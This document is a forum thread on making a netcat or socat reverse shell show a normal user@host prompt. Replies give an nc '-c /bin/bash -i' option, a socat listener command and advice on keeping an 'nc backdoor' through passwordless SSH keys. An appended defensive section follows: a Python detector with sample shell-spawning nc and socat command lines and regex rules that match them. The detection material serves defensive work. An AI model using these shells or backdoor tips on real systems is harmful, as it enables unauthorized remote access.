Thread: help with netcat

  1. #1 | Just burned his ISO | Join Date: Jul 2009 | Posts: 2

    help with netcat

    Hi,

    I'm trying to use netcat to create a bind+reverse shell.

    Everything is going well, but I would like to get the user@host prefix on the `attacker` netcat session.
    I've tried using a pipe, and searching for a fitting switch, but without any luck.

    Any ideas?

  2. #2 | Junior Member | Join Date: Jul 2009 | Posts: 37

    Try running sh or bash right when you gain root.

  3. #3 | Gitsnik (Very good friend of the forum) | Join Date: Jan 2010 | Location: The Crystal Wind | Posts: 851

    Quote Originally Posted by b3r00tb4ck:
        try running sh or bash right when you gain root
    That won't do it, not enough of the environment is set up and nc is not strictly "interactive" in the same sense as ssh or rsh is.

    If you have a nc backdoor, it is far easier to set up ssh to operate in the same way - if you need to, you can install ssh keys with no password to use purely for tunneling (reverse [ -R ] or otherwise [ -L ]), and then log in via the usual method. This will give you a shell, secures your communications, and is an easier way to track the audit log for your report, as SSH automatically logs successful logins.

    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  4. #4 | Junior Member | Join Date: Jan 2010 | Posts: 79

    Look at something like "-c /bin/bash -i" to see if that's what you're looking for.

  5. #5 | imported_vvpalin (Member) | Join Date: Apr 2009 | Posts: 442

    Quote Originally Posted by Gitsnik:
        That won't do it, not enough of the environment is set up and nc is not strictly "interactive" in the same sense as ssh or rsh is.

        If you have a nc backdoor, it is far easier to set up ssh to operate in the same way - if you need to, you can install ssh keys with no password to use purely for tunneling (reverse [ -R ] or otherwise [ -L ]), and then log in via the usual method. This will give you a shell, secures your communications, and is an easier way to track the audit log for your report, as SSH automatically logs successful logins.

    Truly the correct idea, however I'm sure that's way too advanced. The easy way for what he wants would be to write a script that just echoes a me@me:~# so it appears as if you have a standard shell.

    socat can for sure do this, and I've done it, but for the life of me I can't remember the syntax. You can even set up a history file so you can scroll back through your commands, like so:

        socat readline,history=$HOME/blafile,append tcp-l:4444

    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.
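From the defender's side, the command lines discussed in this thread (nc with "-c /bin/bash -i" or "-e /bin/sh", and socat's readline/tcp-l pair) are easy to spot in a process listing. The following is an added example, not code from the thread or any poster: a small Python detector run over a constructed ps-style listing (all PIDs, users and commands are made up for this example).

```python
import re
from typing import List, Tuple

# Constructed sample listing (the pid/user/args columns of `ps -eo pid,user,args`),
# written for this example; it is not output captured from any real host.
SAMPLE_PS = """\
  412 root     /usr/sbin/sshd -D
 1207 www-data nc -l -p 4444 -c /bin/bash -i
 1311 alice    bash
 1450 bob      socat readline,history=/home/bob/.hist,append tcp-l:4444
 1502 carol    nc example.internal 443 -e /bin/sh
 1601 dave     socat TCP:10.0.0.5:22 EXEC:/bin/bash
 1733 root     /usr/bin/python3 /opt/app/server.py
"""

# Each rule is named after the pattern from the thread it covers.
RULES = [
    ("netcat spawning a shell (-e/-c)",
     re.compile(r"\b(nc|netcat|ncat)\b.*\s-(e|c)\s+\S*(sh|bash)\b")),
    ("socat readline/listener pair (prompt emulation)",
     re.compile(r"\bsocat\b.*\breadline\b.*\btcp-l(isten)?:", re.I)),
    ("socat exec-ing a shell over TCP",
     re.compile(r"\bsocat\b(?=.*\btcp:)(?=.*\bexec:\S*(sh|bash)\b)", re.I)),
]

def parse_ps(text: str) -> List[Tuple[int, str, str]]:
    """Split ps-style lines into (pid, user, command) tuples; skips headers."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0].isdigit():
            rows.append((int(parts[0]), parts[1], parts[2]))
    return rows

def find_shell_listeners(text: str) -> List[Tuple[int, str, str]]:
    """Return (pid, user, rule name) for every command matching a rule (first rule wins)."""
    hits = []
    for pid, user, cmd in parse_ps(text):
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((pid, user, name))
                break
    return hits

if __name__ == "__main__":
    for pid, user, why in find_shell_listeners(SAMPLE_PS):
        print(f"pid {pid} ({user}): {why}")
```

The same rules can be fed real `ps -eo pid,user,args` output; a plain `bash` or `sshd` process is not flagged, only nc/socat invocations that wire a shell or a readline prompt to a socket.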
